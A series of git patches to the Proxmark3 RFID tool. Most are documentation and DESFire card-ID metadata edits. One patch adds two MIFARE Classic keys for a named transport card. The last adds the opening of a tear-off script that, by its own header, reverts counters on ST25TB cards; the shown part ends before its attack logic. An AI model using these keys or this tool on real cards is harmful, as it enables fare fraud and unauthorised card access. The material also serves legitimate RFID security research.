Content-Transfer-Encoding: 8bit Typo: Two times HF15SNIFF instead of one HF15SIM in STANDALONE list. Signed-off-by: Benjamin Møller <37707273+LupusE@users.noreply.github.com> --- doc/md/Use_of_Proxmark/4_Advanced-compilation-parameters.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/md/Use_of_Proxmark/4_Advanced-compilation-parameters.md b/doc/md/Use_of_Proxmark/4_Advanced-compilation-parameters.md index 3e85e1369..e79863faa 100644 --- a/doc/md/Use_of_Proxmark/4_Advanced-compilation-parameters.md +++ b/doc/md/Use_of_Proxmark/4_Advanced-compilation-parameters.md @@ -127,7 +127,7 @@ Here are the supported values you can assign to `STANDALONE` in `Makefile.platfo | HF_14ASNIFF | 14a sniff storing to flashmem - Micolous | HF_14BSNIFF | 14b sniff - jacopo-j | HF_15SNIFF | 15693 sniff storing to flashmem - Glaser -| HF_15SNIFF | 15693 simulator - lnv42 +| HF_15SIM | 15693 simulator - lnv42 | HF_AVEFUL | MIFARE Ultralight read/simulation - Ave Ozkal | HF_BOG | 14a sniff with ULC/ULEV1/NTAG auth storing in flashmem - Bogito | HF_CARDHOPPER | Long distance (over IP) relay of 14a protocols - Sam Haskins From b5db711b9a561caf818ada89ecfdd9617077ca60 Mon Sep 17 00:00:00 2001 From: Benjamin DELPY Date: Wed, 29 May 2024 20:48:09 +0200 Subject: [PATCH 027/112] Update intertic.py to support FRA - Clermont-Ferrand (T2C) Signed-off-by: Benjamin DELPY --- client/pyscripts/intertic.py | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/client/pyscripts/intertic.py b/client/pyscripts/intertic.py index 9c2e7f22d..bbd3e8bb9 100644 --- a/client/pyscripts/intertic.py +++ b/client/pyscripts/intertic.py @@ -76,12 +76,13 @@ FRA_OrganizationalAuthority_Contract_Provider = { 0x078: { 4: 'Reims (Citura / Transdev)', }, - 0x502: { - 83: 'Annecy (Sibra)', - }, 0x091: { 1: 'Strasbourg (CTS)', }, + 0x502: { + 83: 'Annecy (Sibra)', + 10: 'Clermont-Ferrand (T2C)', + }, 0x907: { 1: 'Dijon (Divia / Keolis)', }, From 55978431beff6bfc73219b034bd8004ac0810be3 Mon Sep 17 00:00:00 2001 From: Andrei Stefan Date: Fri, 31 May 2024 12:21:41 +0300 Subject: [PATCH 028/112] Update mfc_default_keys.dic --- client/dictionaries/mfc_default_keys.dic | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/client/dictionaries/mfc_default_keys.dic b/client/dictionaries/mfc_default_keys.dic index 10072a3b1..5856c598c 100644 --- a/client/dictionaries/mfc_default_keys.dic +++ b/client/dictionaries/mfc_default_keys.dic @@ -2449,3 +2449,7 @@ D33673C19243 D89A506542F2 E5813CD228F1 FAB943906E9C + +# R.A.T.T transport card key A/B +AA034F342A55 +456776908C48 From f6716c21a78634a2b6935ee2c92166ffaa11319a Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Mon, 3 Jun 2024 10:32:36 +1000 Subject: [PATCH 029/112] Update aid_desfire.json Interim Changes Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 28 ++++++++++++++++++---------- 1 file changed, 18 insertions(+), 10 deletions(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index cdeb11d82..c08f0701b 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -394,18 +394,18 @@ }, { "AID": "F21100", - "Vendor": "MyKI", - "Country": "AUS", - "Name": "Myki", - "Description": "AID found on Myki ticket cards", + "Vendor": "Public Transport Victoria [PTV] via Conduent", + "Country": "AU", + "Name": "myki", + "Description": "FIDs: 0F: Standard Data; 00: Backup Data", "Type": "transport" }, { "AID": "F210F0", - "Vendor": "MyKI", - "Country": "AUS", - "Name": "Myki", - "Description": "AID found on Myki ticket cards", + "Vendor": "Public Transport Victoria [PTV] via Conduent", + "Country": "AU", + "Name": "myki", + "Description": "FIDs: 01/02: Cyclic Record; 03: myki money Balance; 00/04/05: Backup Data; 08/09/0A/0B/0C/0F: Standard Data", "Type": "transport" }, { @@ -554,9 +554,9 @@ }, { "AID": "F48EF1", - "Vendor": "SALTO Access credential", + "Vendor": "Salto Systems", "Country": "ES", - "Name": "SALTO Access credential", + "Name": "Salto Systems", "Description": "", "Type": "pacs" }, @@ -583,5 +583,13 @@ "Name": "Presto Card", "Description": "", "Type": "transport" + }, + { + "AID": "F48EFD", + "Vendor": "Salto Systems", + "Country": "ES", + "Name": "Salto KS", + "Description": "Access Control #13 // Key as a Service // FID: 01 - Standard Data", + "Type": "pacs" } ] From a71ab3e6ab8692e8ed9bb9fcb174e8898385bb36 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Mon, 3 Jun 2024 15:41:08 +1000 Subject: [PATCH 030/112] Update aid_desfire.json Interim edits 2 Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 76 ++++++++++++++++++++----------- 1 file changed, 50 insertions(+), 26 deletions(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index c08f0701b..80d3e6e02 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -33,10 +33,10 @@ }, { "AID": "4F5931", - "Vendor": "Transport of London", + "Vendor": "Transport for London [TfL]", "Country": "UK", "Name": "Oyster Card", - "Description": "", + "Description": "FIDs: 00-07: Standard Data", "Type": "transport" }, { @@ -121,10 +121,18 @@ }, { "AID": "F21030", - "Vendor": "ORCA (VUX/ERG)", - "Country": "", - "Name": "ORCA Card", - "Description": "(FIDs 02: Trip History; 04: current balance)", + "Vendor": "Puget Sound Transit Agencies", + "Country": "US", + "Name": "ORCA", + "Description": "VUX/ERG // One Regional Card For All // FIDs 02: Trip History; 04: current balance)", + "Type": "transport" + }, + { + "AID": "F213F0", + "Vendor": "Puget Sound Transit Agencies", + "Country": "US", + "Name": "ORCA", + "Description": "VUX/ERG // One Regional Card for All // FIDs 00: Standard Data; 01: Backup Data)", "Type": "transport" }, { @@ -397,7 +405,7 @@ "Vendor": "Public Transport Victoria [PTV] via Conduent", "Country": "AU", "Name": "myki", - "Description": "FIDs: 0F: Standard Data; 00: Backup Data", + "Description": "myki App 1 // FIDs: 0F: Standard Data; 00: Backup Data", "Type": "transport" }, { @@ -405,23 +413,39 @@ "Vendor": "Public Transport Victoria [PTV] via Conduent", "Country": "AU", "Name": "myki", - "Description": "FIDs: 01/02: Cyclic Record; 03: myki money Balance; 00/04/05: Backup Data; 08/09/0A/0B/0C/0F: Standard Data", + "Description": "myki App 2 // FIDs: 01/02: Transaction History; 03: myki money Balance; 00/04/05: Backup Data; 08/09/0A/0B/0C/0F: Standard Data", "Type": "transport" }, { "AID": "F206B0", - "Vendor": "ACS", - "Country": "AUS", - "Name": "Metrocard / ACS", - "Description": "", + "Vendor": "Adelaide Metro", + "Country": "AU", + "Name": "metroCARD", + "Description": "ACS // Not to be confused with CHC Metrocard", + "Type": "transport" + }, + { + "AID": "8113F2", + "Vendor": "Chicago Transit Authority [CTA]", + "Country": "US", + "Name": "Ventra Card", + "Description": "Multi-Modal Transit #1 // FIDs: 00/01: Standard Data", + "Type": "transport" + }, + { + "AID": "F21390", + "Vendor": "Multiple NZ Transit Agencies via Otago Regional Council", + "Country": "NZ", + "Name": "Bee Card", + "Description": "Multi-Modal Transit #0 // FIDs: 00: Backup Data; 01/02: Trip History; 03: Card Balance", "Type": "transport" }, { "AID": "F21050", - "Vendor": "INIT", + "Vendor": "Metro Christchurch", "Country": "NZ", - "Name": "Metrocard / Christchurch", - "Description": "", + "Name": "INIT // Metrocard", + "Description": "Not to be confused with ADL metroCARD // Multi-Modal Transit #0 // FIDs: 00: Backup Data; 01/02: Trip History; 03: Card Balance", "Type": "transport" }, { @@ -482,26 +506,26 @@ }, { "AID": "554000", - "Vendor": "AT HOP", - "Country": "", - "Name": "AT HOP", - "Description": "", + "Vendor": "Auckland Transport", + "Country": "NZ", + "Name": "AT HOP Card", + "Description": "FIDs: 00: Backup Data; 08/09/0A", "Type": "transport" }, { "AID": "534531", - "Vendor": "OPAL", - "Country": "AUS", - "Name": "OPAL", + "Vendor": "Transport for New South Wales [TfNSW]", + "Country": "AU", + "Name": "Opal Card", "Description": "", "Type": "transport" }, { "AID": "2211AF", - "Vendor": "Leap", - "Country": "", - "Name": "Leap", - "Description": "", + "Vendor": "National Transport Authority", + "Country": "IE", + "Name": "TFI Leap Card", + "Description": "Transport for Ireland // FIDs: 01/1F: Backup Data; 02/0A/03/04/05/06/07/08/09: Standard Data", "Type": "transport" }, { From 231a503215c42aed880393480239180d80787f7e Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Mon, 3 Jun 2024 18:02:35 +1000 Subject: [PATCH 031/112] Update aid_desfire.json Interim updates. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 52 +++++++++++++++---------------- 1 file changed, 26 insertions(+), 26 deletions(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index 80d3e6e02..b3b34d394 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -81,11 +81,11 @@ }, { "AID": "784000", - "Vendor": "NOL", - "Country": "UAE", - "Name": "Nol Card/Dubai", - "Description": "Nol Card/Dubai", - "Type": "" + "Vendor": "Roads & Transport Authority [Government of Dubai]", + "Country": "AE", + "Name": "nol Card", + "Description": "DXB nol Card", + "Type": "transport" }, { "AID": "956B19", @@ -402,26 +402,26 @@ }, { "AID": "F21100", - "Vendor": "Public Transport Victoria [PTV] via Conduent", + "Vendor": "Public Transport Victoria [PTV] via Conduent [formerly via Keane Australia Pty Ltd]", "Country": "AU", "Name": "myki", - "Description": "myki App 1 // FIDs: 0F: Standard Data; 00: Backup Data", + "Description": "myki App 1 // FIDs 0F: Standard Data; 00: Backup Data", "Type": "transport" }, { "AID": "F210F0", - "Vendor": "Public Transport Victoria [PTV] via Conduent", + "Vendor": "Public Transport Victoria [PTV] via Conduent [formerly via Keane Australia Pty Ltd]", "Country": "AU", "Name": "myki", - "Description": "myki App 2 // FIDs: 01/02: Transaction History; 03: myki money Balance; 00/04/05: Backup Data; 08/09/0A/0B/0C/0F: Standard Data", + "Description": "myki App 2 // FIDs 01-02: Transaction History; 03: myki money Balance; 00,04-05: Backup Data; 08-0C,0F: Standard Data", "Type": "transport" }, { "AID": "F206B0", - "Vendor": "Adelaide Metro", + "Vendor": "Adelaide Metro via Affiliated Computer Services [ACS]", "Country": "AU", "Name": "metroCARD", - "Description": "ACS // Not to be confused with CHC Metrocard", + "Description": "Not to be confused with CHC Metrocard // FIDs 00,02-07,09-0B,10-17,1B-1C: Backup Data; 01,1D: Linear Record File; 08: ABNote Adelaide; 1E: Standard Data; 0C-0F: Card Balance", "Type": "transport" }, { @@ -429,7 +429,7 @@ "Vendor": "Chicago Transit Authority [CTA]", "Country": "US", "Name": "Ventra Card", - "Description": "Multi-Modal Transit #1 // FIDs: 00/01: Standard Data", + "Description": "Multi-Modal Transit #1 // FIDs: 00-01 Standard Data", "Type": "transport" }, { @@ -437,7 +437,7 @@ "Vendor": "Multiple NZ Transit Agencies via Otago Regional Council", "Country": "NZ", "Name": "Bee Card", - "Description": "Multi-Modal Transit #0 // FIDs: 00: Backup Data; 01/02: Trip History; 03: Card Balance", + "Description": "Multi-Modal Transit #0 // FIDs 00: Backup Data; 01-02: Trip History; 03: Card Balance", "Type": "transport" }, { @@ -517,7 +517,7 @@ "Vendor": "Transport for New South Wales [TfNSW]", "Country": "AU", "Name": "Opal Card", - "Description": "", + "Description": "FIDs 00-06: Standard Data; 07: Card Balance/Number and Trip History", "Type": "transport" }, { @@ -554,18 +554,18 @@ }, { "AID": "000001", - "Vendor": "Invalid / reserved", + "Vendor": "Invalid / Reserved", "Country": "", - "Name": "Invalid / reserved", - "Description": "used by Compass DESFire and Breeze DESFire", + "Name": "Invalid / Reserved", + "Description": "Used by YVR Compass and ATL Breeze", "Type": "transport" }, { "AID": "FFFFFF", - "Vendor": "Reserved for future use", + "Vendor": "Reserved for Future Use", "Country": "", - "Name": "Reserved for future use", - "Description": "used by AT HOP, Nol, ORCA", + "Name": "Reserved for Future Use", + "Description": "Used by AKL AT HOP, DXB nol, and SEA ORCA", "Type": "transport" }, { @@ -589,23 +589,23 @@ "Vendor": "Prima Systems", "Country": "SI", "Name": "Prima FlexAir Access Control", - "Description": "FIDs: 00 - DRM, 01 - Access Event Log, 04 - Access Permissions", + "Description": "FIDs 00: DRM; 01: Access Event Log; 04: Access Permissions", "Type": "pacs" }, { "AID": "FF30FF", "Vendor": "Metrolinx", "Country": "CA", - "Name": "Presto Card", - "Description": "", + "Name": "PRESTO Card", + "Description": "FID 08: Standard Data", "Type": "transport" }, { "AID": "002000", "Vendor": "Metrolinx", "Country": "CA", - "Name": "Presto Card", - "Description": "", + "Name": "PRESTO Card", + "Description": "FIDs 00,0F: Backup Data; 08-0E,10-14: Standard Data", "Type": "transport" }, { @@ -613,7 +613,7 @@ "Vendor": "Salto Systems", "Country": "ES", "Name": "Salto KS", - "Description": "Access Control #13 // Key as a Service // FID: 01 - Standard Data", + "Description": "Access Control #13 // Key as a Service // FID 01: Standard Data", "Type": "pacs" } ] From aacc6b9db0c7ded65389b9b6e561a92c7eff43e8 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Tue, 4 Jun 2024 13:43:37 +1000 Subject: [PATCH 032/112] Update aid_desfire.json Interim changes. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index b3b34d394..c0666ebfc 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -421,7 +421,7 @@ "Vendor": "Adelaide Metro via Affiliated Computer Services [ACS]", "Country": "AU", "Name": "metroCARD", - "Description": "Not to be confused with CHC Metrocard // FIDs 00,02-07,09-0B,10-17,1B-1C: Backup Data; 01,1D: Linear Record File; 08: ABNote Adelaide; 1E: Standard Data; 0C-0F: Card Balance", + "Description": "Bus Rail Fare Collection #0 // Not to be confused with CHC Metrocard // FIDs 00,02-07,09-0B,10-17,1B-1C: Backup Data; 01,1D: Linear Record File; 08: ABNote / HID Adelaide; 1E: Standard Data; 0C-0F: Card Balance", "Type": "transport" }, { From 97789db70146ffea4d9631007e4d1f4b51900452 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Tue, 4 Jun 2024 13:50:10 +1000 Subject: [PATCH 033/112] Update aid_desfire.json Interim Updates. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index c0666ebfc..c83ce6a50 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -429,7 +429,7 @@ "Vendor": "Chicago Transit Authority [CTA]", "Country": "US", "Name": "Ventra Card", - "Description": "Multi-Modal Transit #1 // FIDs: 00-01 Standard Data", + "Description": "Gen 2 Blue Cards // Multi-Modal Transit #1 // FIDs: 00-01 Standard Data", "Type": "transport" }, { From 8206a7f0144bbd22352635be998e8fdce2de96c1 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Tue, 4 Jun 2024 20:12:13 +1000 Subject: [PATCH 034/112] Update aid_desfire.json Formatting updates. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index c83ce6a50..d896cfe4c 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -159,7 +159,6 @@ "Description": "", "Type": "payment system" }, - { "AID": "F88280", "Vendor": "TU Delft", @@ -216,7 +215,7 @@ "Description": "", "Type": "student" }, - { + { "AID": "535505", "Vendor": "TU Delft", "Country": "NL", @@ -224,7 +223,7 @@ "Description": "", "Type": "student" }, - { + { "AID": "535506", "Vendor": "TU Delft", "Country": "NL", @@ -240,7 +239,7 @@ "Description": "", "Type": "student" }, - { + { "AID": "535508", "Vendor": "TU Delft", "Country": "NL", @@ -256,7 +255,7 @@ "Description": "", "Type": "student" }, - { + { "AID": "53550A", "Vendor": "TU Delft", "Country": "NL", @@ -264,7 +263,7 @@ "Description": "", "Type": "student" }, - { + { "AID": "53550B", "Vendor": "TU Delft", "Country": "NL", @@ -288,7 +287,7 @@ "Description": "Campus Card", "Type": "student" }, - { + { "AID": "15845F", "Vendor": "InterCard GmbH Kartensysteme", "Country": "DE", @@ -296,7 +295,7 @@ "Description": "Campus Card", "Type": "student" }, - { + { "AID": "25845F", "Vendor": "InterCard GmbH Kartensysteme", "Country": "DE", From b7f5e5b9acf00392509421b497c66af98dd88723 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Tue, 4 Jun 2024 21:38:42 +1000 Subject: [PATCH 035/112] Update aid_desfire.json Minor updates. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index d896cfe4c..424ea8f89 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -4,7 +4,7 @@ "Vendor": "NFC Forum", "Country": "US", "Name": "NFC Forum NDEF Tag", - "Description": "(FID 03: Capability Container)", + "Description": "FID 03: Capability Container", "Type": "ndef" }, { @@ -35,16 +35,16 @@ "AID": "4F5931", "Vendor": "Transport for London [TfL]", "Country": "UK", - "Name": "Oyster Card", + "Name": "Oyster Card", m "Description": "FIDs: 00-07: Standard Data", "Type": "transport" }, { "AID": "422201", "Vendor": "Transport of Istanbul", - "Country": "Turkey", + "Country": "TR", "Name": "Istanbulkart", - "Description": "", + "Description": "Istanbul Card", "Type": "transport" }, { @@ -60,7 +60,7 @@ "Vendor": "LEGIC", "Country": "DE", "Name": "Legic", - "Description": "(FID 02: EF-CONF)", + "Description": "FID 02: EF-CONF", "Type": "" }, { @@ -68,7 +68,7 @@ "Vendor": "NORTIC", "Country": "", "Name": "NORTIC Card Issuer", - "Description": "(FID 0C: Card Issuer Header)", + "Description": "FID 0C: Card Issuer Header", "Type": "transport" }, { From 6a323c1c949f9d00c057ec98322e054e1a0c0487 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Tue, 4 Jun 2024 21:49:50 +1000 Subject: [PATCH 036/112] Update aid_desfire.json Corrected typo based on PM3 command: hf mfdes lsapp --no-auth Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index 424ea8f89..ab075e1b9 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -124,7 +124,7 @@ "Vendor": "Puget Sound Transit Agencies", "Country": "US", "Name": "ORCA", - "Description": "VUX/ERG // One Regional Card For All // FIDs 02: Trip History; 04: current balance)", + "Description": "VIX / ERG Transit Sysyems // One Regional Card For All // FIDs 02: Trip History; 04: current balance", "Type": "transport" }, { From 741ebb94ce7f70bab5ac13475f9cb7f49c2e186f Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Tue, 4 Jun 2024 21:52:35 +1000 Subject: [PATCH 037/112] Update aid_desfire.json Corrected typo Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index ab075e1b9..b28336fb3 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -35,7 +35,7 @@ "AID": "4F5931", "Vendor": "Transport for London [TfL]", "Country": "UK", - "Name": "Oyster Card", m + "Name": "Oyster Card", "Description": "FIDs: 00-07: Standard Data", "Type": "transport" }, From b89b931bf8b0cfaed9c39942b38066fdc212b24b Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Tue, 4 Jun 2024 22:05:07 +1000 Subject: [PATCH 038/112] Update aid_desfire.json Style Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index b28336fb3..3adf604b9 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -76,7 +76,7 @@ "Vendor": "NORTIC", "Country": "", "Name": "NORTIC Transport", - "Description": "(FIDs 01: Transport Product Retailer; 02: Transport Service Provider; 03: Transport Special Event; 04: Transport Stored Value; 05: Transport General Event Log; 06: Transport SV Reload Log; 0A: Transport Environment; 0C: Transport Card Holder", + "Description": "FIDs 01: Transport Product Retailer; 02: Transport Service Provider; 03: Transport Special Event; 04: Transport Stored Value; 05: Transport General Event Log; 06: Transport SV Reload Log; 0A: Transport Environment; 0C: Transport Card Holder", "Type": "transport" }, { @@ -132,7 +132,7 @@ "Vendor": "Puget Sound Transit Agencies", "Country": "US", "Name": "ORCA", - "Description": "VUX/ERG // One Regional Card for All // FIDs 00: Standard Data; 01: Backup Data)", + "Description": "VUX/ERG // One Regional Card for All // FIDs 00: Standard Data; 01: Backup Data", "Type": "transport" }, { @@ -140,7 +140,7 @@ "Vendor": "Clipper", "Country": "US", "Name": "Clipper Card/San Francisco Bay Area ", - "Description": "(FIDs 02: current balance; 04: Refill History; 08: Card Information; 0E: Trip History)\\nFFFFFF General Issuer Information (FIDs 00: MAD Version; 01: Card Holder; 02: Card Publisher)", + "Description": "FIDs 02: current balance; 04: Refill History; 08: Card Information; 0E: Trip History]\\nFFFFFF General Issuer Information // FIDs 00: MAD Version; 01: Card Holder; 02: Card Publisher", "Type": "transport" }, { @@ -348,7 +348,7 @@ "Vendor": "Gallagher", "Country": "NZ", "Name": "Access control", - "Description": "Card Application Directory (CAD)", + "Description": "Card Application Directory [CAD]", "Type": "pacs" }, { @@ -569,7 +569,7 @@ }, { "AID": "F52310", - "Vendor": "Integrated Control Technology Limited (ICT)", + "Vendor": "Integrated Control Technology Limited [ICT]", "Country": "NZ", "Name": "ICT Access credential", "Description": "", From 2f2b288624784bab60751442064d313da5059249 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Tue, 4 Jun 2024 22:52:20 +1000 Subject: [PATCH 039/112] Update aid_desfire.json Corrected VIX typo. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index 3adf604b9..fde05169f 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -132,7 +132,7 @@ "Vendor": "Puget Sound Transit Agencies", "Country": "US", "Name": "ORCA", - "Description": "VUX/ERG // One Regional Card for All // FIDs 00: Standard Data; 01: Backup Data", + "Description": "VIX / ERG Transit Systems // One Regional Card for All // FIDs 00: Standard Data; 01: Backup Data", "Type": "transport" }, { From b6060f423b82a44e44ce670f990fb2db076ddcb6 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Tue, 4 Jun 2024 23:00:32 +1000 Subject: [PATCH 040/112] Update aid_desfire.json Made minor correction to CHC Metrocard Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index fde05169f..a147643d2 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -441,9 +441,9 @@ }, { "AID": "F21050", - "Vendor": "Metro Christchurch", + "Vendor": "Metro Christchurch via INIT", "Country": "NZ", - "Name": "INIT // Metrocard", + "Name": "Metrocard", "Description": "Not to be confused with ADL metroCARD // Multi-Modal Transit #0 // FIDs: 00: Backup Data; 01/02: Trip History; 03: Card Balance", "Type": "transport" }, From 6e6d00505fc52941df930966f25e3c64b61f8171 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Thu, 6 Jun 2024 14:45:06 +0200 Subject: [PATCH 041/112] added the tears_for_fears.py script by Pierre Granier --- CHANGELOG.md | 1 + tools/pm3_tears_for_fears.py | 553 +++++++++++++++++++++++++++++++++++ 2 files changed, 554 insertions(+) create mode 100644 tools/pm3_tears_for_fears.py diff --git a/CHANGELOG.md b/CHANGELOG.md index c03f3a4d5..7ee87196e 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -3,6 +3,7 @@ All notable changes to this project will be documented in this file. This project uses the changelog in accordance with [keepchangelog](http://keepachangelog.com/). Please use this to write notable changes, which is not the same as git commit log... ## [unreleased][unreleased] +- Added `pm3_tears_for_fears.py` - a ISO14443b tear off script by Pierre Granier ## [Aurora.4.18589][2024-05-28] - Fixed the pm3 regressiontests for Hitag2Crack (@iceman1001) diff --git a/tools/pm3_tears_for_fears.py b/tools/pm3_tears_for_fears.py new file mode 100644 index 000000000..0670ceccb --- /dev/null +++ b/tools/pm3_tears_for_fears.py @@ -0,0 +1,553 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +#+---------------------------------------------------------------------------+ +#| Tears For Fears : Utilities for reverting counters of ST25TB* cards | +#+---------------------------------------------------------------------------+ +#| Copyright (C) Pierre Granier - 2024 | +#| | +#| This program is free software: you can redistribute it and/or modify | +#| it under the terms of the GNU General Public License as published by | +#| the Free Software Foundation, either version 3 of the License, or | +#| (at your option) any later version. | +#| | +#| This program is distributed in the hope that it will be useful, | +#| but WITHOUT ANY WARRANTY; without even the implied warranty of | +#| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | +#| GNU General Public License for more details. | +#| | +#| You should have received a copy of the GNU General Public License | +#| along with this program. If not, see . | +#+---------------------------------------------------------------------------+ +# +# Ref: +# https://gitlab.com/SiliconOtter/tears4fears +# + +import argparse +from queue import Queue, Empty +import re +from subprocess import Popen, PIPE +from time import sleep +from threading import Thread + +PM3_SUBPROC = None +PM3_SUBPROC_QUEUE = None + + +class colors: + + reset = '\033[0m' + bold = '\033[01m' + disable = '\033[02m' + underline = '\033[04m' + reverse = '\033[07m' + strikethrough = '\033[09m' + invisible = '\033[08m' + + purple = '\033[35m' + red = '\033[31m' + green = '\033[32m' + blue = '\033[34m' + lightred = '\033[91m' + lightgreen = '\033[92m' + lightblue = '\033[94m' + + +def main(): + + global PM3_SUBPROC + global PM3_SUBPROC_QUEUE + + parser = argparse.ArgumentParser() + parser.add_argument("-s", + "--strat", + type=int, + nargs="?", + const="1", + default="1", + dest="strategy", + help="Strategy to use (default 1)") + parser.add_argument("-b", + "--block", + type=int, + nargs="?", + const="-1", + default="-1", + required=True, + dest="target_block", + help="Target Block") + parser.add_argument("-p", + "--pm3-client", + type=str, + default="pm3", + dest="pm3_path", + help="pm3 client path") + + args = parser.parse_args() + + PM3_SUBPROC = Popen([args.pm3_path, "-i", "-f"], stdin=PIPE, stdout=PIPE) + PM3_SUBPROC_QUEUE = Queue() + + thread = Thread(target=enqueue_output, + args=(PM3_SUBPROC.stdout, PM3_SUBPROC_QUEUE)) + thread.start() + + if args.target_block != -1: + tear_for_fears(args.target_block, args.strategy) + else: + parser.error("--block is required ") + + sub_com('exit') + thread.join() + + +def enqueue_output(out, queue): + """Continuously read PM3 client stdout and fill a global queue + + Args: + out: stdout of PM3 client + queue: where to push "out" content + """ + for line in iter(out.readline, b""): + queue.put(line) + out.close() + + +def sub_com(command, func=None, sleep_over=0): + """Send command to aPM3 client + + Args: + command: String of the command to send + func: hook for a parsing function on the pm3 command end + + Returns: + result of the hooked function if any + """ + global PM3_SUBPROC + global PM3_SUBPROC_QUEUE + + result = None + + sleep(sleep_over) + + PM3_SUBPROC.stdin.write(bytes((command + "\n").encode("ascii"))) + PM3_SUBPROC.stdin.flush() + if func: + while not result: + try: + result = func(str(PM3_SUBPROC_QUEUE.get(timeout=.5))) + except Empty: + PM3_SUBPROC.stdin.write(bytes( + (command + "\n").encode("ascii"))) + PM3_SUBPROC.stdin.flush() + + return result + + +def set_space(space): + """Placeholder for instrumentalization or do it manually + + Args: + space: distance needed + + Returns: + """ + input(f"\nSet Reader <-> Card distance to {space} and press enter : \n") + + +def parse_rdbl(str_to_parse): + """Return a list of str of a block from pm3 output + Uses `rbdl` in pm3 client + + Args: + str_to_parse: string to parse + + Returns: + string list + """ + tmp = re.search(r"block \d*\.\.\. ([0-9a-fA-F]{2} ){4}", str_to_parse) + if tmp: + # print(tmp) + return re.findall(r"[0-9a-fA-F]{2}", tmp.group(0).split("... ")[1]) + return None + + +def parse_UID(str_to_parse): + """Return a card UID from pm3 output + + Args: + str_to_parse: string to parse + + Returns: + string list + """ + tmp = re.search(r"UID: ([0-9a-fA-F]{2} )*", str_to_parse) + if tmp: + return re.findall(r"[0-9a-fA-F]{2}", tmp.group(0).split(": ")[1]) + return None + + +def slist_to_int(list_source): + 